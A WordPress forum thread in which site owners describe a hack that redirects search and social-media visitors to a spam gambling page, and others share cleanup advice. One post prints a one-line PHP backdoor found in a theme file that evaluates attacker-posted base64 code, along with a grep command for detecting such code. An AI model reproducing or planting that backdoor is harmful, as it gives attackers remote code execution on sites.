Site linking to http://notfound.iownyour.org/ (7 posts)

  1. dmcrae17
    Posted 3 years ago #

    I am having issues with my site redirecting to http://notfound.iownyour.org/ which looks like a fake search engine, advertising online blackjack. I am experiencing the following specific issues:

    1) When clicking one of my site's links from Facebook on Firefox and Safari: redirects to the above spam website

    2) When clicking one of my site's links from Facebook on Google Chrome: redirects to my website with no issue

    3) When searching and clicking the link of my site "Craving Cognition" on Google using any browser, it redirects to above spam website.

    My site is: http://cravingcognition.com

    Help would be appreciated!

  2. esmi
    Forum Moderator
    Posted 3 years ago #

    A scan of your site is clean but this does sound like a hack. :-(

    I think you really need to start working your way through these resources:

    Anything less will probably result in the hacker walking straight back into your site again.

  3. manugallack
    Posted 3 years ago #

    I've got the same problem with my site :

    When searching and clicking the link of my site "montblanc34.com" on Google, the under-categories redirect to this website :


    If someone can help me.... (in french would be better !!)

  4. bcworkz
    Posted 3 years ago #

    @manugallack, I am not observing the behavior you describe. You must confirm if it is your site that is redirecting or your browser that is redirecting. These selective redirects can be difficult to isolate.

    Or perhaps you fixed the problem? If not, and if it is indeed your site that is redirecting, follow the suggestions posted by esmi above. I am sorry, I am unaware of such resources in French.

  5. juanmatias
    Posted 3 years ago #


    Hi all.

    I had the same issue in my server (http://www.jackyiddo.com), when I accessed directly from address bar there is no problem. But if I found my site on Goole and then clicked on muy address then I was redirected to other site. This is what I found.

    This pice of code was inserted in a few files into the WordPress directory tree:

    [ Moderator note: Please do not post that malware code here. ]

    Now, if you decode this base64 encoded text you will have this:

    [ Redacted ]

    As you can see depending on a few parameters the site is redirected.

    You need to find the modified files and delete this command (this command could be multiple times in a single file). I found this piece of code in these files:

    • wp-config.php
    • wp-settings.php
    • wp-content/plugins/contact-form-7/modules/acceptance.php
    • wp-content/plugins/contact-form-7/modules/quiz.php
    • wp-content/plugins/contact-form-7/modules/select.php
    • wp-content/plugins/contact-form-7/modules/special-mail-tags.php
    • wp-content/plugins/contact-form-7/modules/jetpack.php
    • wp-content/plugins/contact-form-7/modules/akismet.php
    • wp-content/plugins/contact-form-7/modules/captcha.php
    • wp-content/plugins/contact-form-7/modules/text.php
    • wp-content/plugins/contact-form-7/modules/textarea.php
    • wp-content/plugins/contact-form-7/modules/checkbox.php
    • wp-content/plugins/contact-form-7/modules/file.php
    • wp-content/plugins/contact-form-7/modules/submit.php
    • wp-content/plugins/contact-form-7/modules/response.php
    • wp-content/plugins/contact-form-7/modules/flamingo.php

    Plus in file wp-content/themes/picturethis/404.php I found this code:

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

    I don't know if it is malicious, but I deleted it just in case and my site is working ok.

    How to find this code through your dir tree?

    If you have access to server's command line you can run this command:

    find ./ -name \*php -type f -exec grep -l 'eval.base64_decode' {} +

    (It will find the code into PHP files)

    From here on you must delete the code as you prefer.

    I hope this is useful for you.

  6. methos10
    Posted 3 years ago #

    Hi dmcrae17!

    This is a js based malware. If you will disable the javascript in your browser it will work. You can test it.
    But is not a solution!! The solution is if you will download the latest version of the WordPress and owerride all of your files. Change your ftp and mysql password.
    After the uprade your site should work.

    I hope it was helpful!

  7. Andrew Nevins
    Forum moderator
    Posted 3 years ago #

    The solution isn't removing the malicious code. That will only resolve the symptom of the hack. The website will still remain hacked.

    Follow the links provided by Esmi to resolve a hack.

Topic Closed

This topic has been closed to new replies.

About this Topic